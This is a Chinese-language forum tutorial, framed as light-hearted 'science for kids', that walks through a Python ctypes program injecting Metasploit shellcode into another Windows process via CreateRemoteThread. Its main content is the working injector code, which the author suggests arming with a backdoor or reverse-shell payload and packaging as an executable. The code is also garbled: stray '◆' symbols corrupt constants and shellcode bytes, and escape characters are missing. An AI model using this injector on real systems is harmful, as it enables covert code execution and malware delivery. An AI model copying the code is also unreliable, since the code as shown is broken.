|
阅读:2975回复:0
Python编写shellcode注入程序
◆0 背景
本文为《小学生科普系列》的番外篇,本系列面向小学生,纯科普,大牛莫喷~ 教程中所有内容仅供学习研究,请勿用于非法用途,否则....我也帮不了你啊... 说起注入,大家第一印象可能还习惯性的停留在sql注入,脚本注入(XSS)等。今天light同(jiao)学(shou)带大家从web端回到操作系统,一起探讨Windows下的经典注入——内存注入,使用python编写一个简单的代码注入程序。 内存注入常见的方法有dll注入和代码注入。Dll注入通俗地讲就是把我们自己的dll注入到目标进程的地址空间内,“寄生”在目标进程里执行。Dll注入需要另外一个“推进器”程序将我们的“寄生虫”dll“注”进目标进程中。 代码注入和dll注入的思路一致,只是“寄生虫”代码与“推进器”代码在同一个程序里面。 Dll文件:windows动态链接库。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被调用。 这次我们的实验选取“代码注入”这一课题。废话不多说,开始动手! ◆1 准备工作 写python的小程序,light同学推荐性感的Sublime text2 +JEDI(python自动补全插件)。 首先安装sublime text2的“插件管理”插件package control: 打开sublime后,组合键“ctrl+~”调出控制台,将以下代码粘贴进命令行中并回车: #!pythonimport urllib2,os;pf='Package Control.sublime-package';ipp=sublime.installed_packages_path();os.makedirs(ipp) if not os.path.exists(ipp) else None;open(os.path.join(ipp,pf),'wb').write(urllib2.urlopen('http://sublime.wbond.net/'+pf.replace(' ','%20')).read())安装完毕后重启sublime text2,输入Ctrl + Shift + P 然后输入Install Package 然后输入“jedi”,回车安装。 磨刀不误砍柴工,装好插件,我们开始正式撸代码。 ◆2 烹饪开始 原料:win7、python27、sublime text2、msfpayload 必备技能:windows api 基础、python基础、metasploit基础(这个还不会的赶快去这里补习!http://zone.wooyun.org/content/17377) 这次的注入代码主要借助了python的ctypes库,这个库使得python可以直接调用windows API,非常方便。“为什么不用c或者c++?”,因为我手头边只有一本《gray hat python》。 #!python#-*- coding:utf-8 -*-#导入sys库以及ctypes库import sysfrom ctypes import *PAGE_EXECUTE_READWRITE = ◆0000040PROCESS_ALL_ACCESS = ( ◆00F0000 | ◆0100000 | 0xFFF )VIRTUAL_MEM = ( 0x1000 | 0x2000 )kernel32 = windll.kernel32pid = int(sys.argv[1])if not sys.argv[1]: print "Code Injector: ./code_injector.py " sys.exit(0)# shellcode使用msfpayload生成的,我这里是一个计算器,当然你可以直接生成一个后门程# 序。生成代码:msfpayload windows/exec CMD = calc.exe EXITFUNC=thread C shellcode = ("xfcxe8x89x0◆◆0x60x89xe5x31xd2x64x8bx52x30""x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff""x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2""xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85""xc0x74x4ax01xd0x50x8bx48x18x8bx58x2◆1xd3xe3""x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0d""x01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58""x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8b""x04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xff""xe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00""x0◆0x50x68x31x8bx6fx87xffxd5xbbxaaxc5xe2x5d""x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75""x05xbbx47x13x72x6fx6ax00x53xffxd5x63x61x6cx63""x2ex65x78x65x00")code_size = len(shellcode)# 获取我们要注入的进程句柄h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )if not h_process: print " [*] Couldn't acquire a handle to PID: %s" % pid sys.exit(0)# 为我们的shellcode申请内存arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)# 在内存中写入shellcodewritten = c_int(0)kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))# 创建远程线程,指定入口为我们的shellcode头部thread_id = c_ulong(0)if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)): print " [*] Failed to inject shellcode. Exiting."sys.exit(0)print " [*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value句柄:句柄与普通指针的区别在于,指针包含的是引用对象的内存地址,而句柄则是由系统所管理的引用标识,该标识可以被系统重新定位到一个内存地址上。这种间接访问对象的模式增强了系统对引用对象的控制。 可以看到,之所以能进行内存注入,主要归功于windows开放的一个关键api:CreateRemoteThread。这个函数允许我们创建一个在其它进程地址空间中运行的线程(也称:创建远程线程)。 而整个注入过程可以划分为三个步骤:获取目标进程句柄,把shellcode写入内存,创建远程线程。这也是内存注入的基本原理和机制。 在使用msfpayload生成shellcode时,有两个坑需要大家注意。 坑一: Msfpayload生成shellcode时,不能使用msfencode,有些资料告诉我们生成shellcode时要在后面加上 msfencode -b ‘x00’ 来避免空字,但是msfencode一旦使用,默认就会使用 x86/shikata_ga_nai 等编码器对shellcode编码一次。这里light同学推荐大家用 msfpayload xxx C的方式来生成纯净的shellcode。 坑二: msfpayload windows/exec CMD = calc.exe C 直接生成的shellcode执行结果是宿主100%崩溃,简直就是进程杀手。我在测试过程中,把用来测试的百度云管家崩的天昏地暗。这个坑花了好久才跳出来。 后来号基友用ollydbg调试发现shellcode退出时直接exit process,把整个进程都结束了。 图片:2015021110461995881.png  在基友热心帮助下,再参考msfpayload官方文档后顿悟,果断修改EXITFUNC的值为thread(默认为process): 图片:2015021110461995881.png 测试成功! 最后,我们可以把这个python脚本用py2exe打包成exe可执行文件。有兴趣的话还可以加上UI,做成一个可以定制不同注入类型(dll或代码注入)、注入代码(反向后门或恶作剧程序)的程序。 任何问题或者好的建议请骚扰:[email protected] 参考文档: 《gray hat python》 http://www.offensive-security.com/metasploit-unleashed/Msfpayload http://www.google.com |
|
